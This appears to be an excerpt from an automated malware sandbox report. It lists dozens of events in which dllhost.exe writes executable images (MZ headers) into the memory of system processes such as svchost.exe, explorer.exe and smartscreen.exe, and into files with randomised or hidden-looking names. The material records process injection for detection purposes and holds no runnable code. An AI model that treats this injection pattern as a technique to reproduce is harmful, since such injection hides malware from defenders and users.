Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2A463AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22125DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18198570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 8D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 242997D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000 value starts with: 4D5A
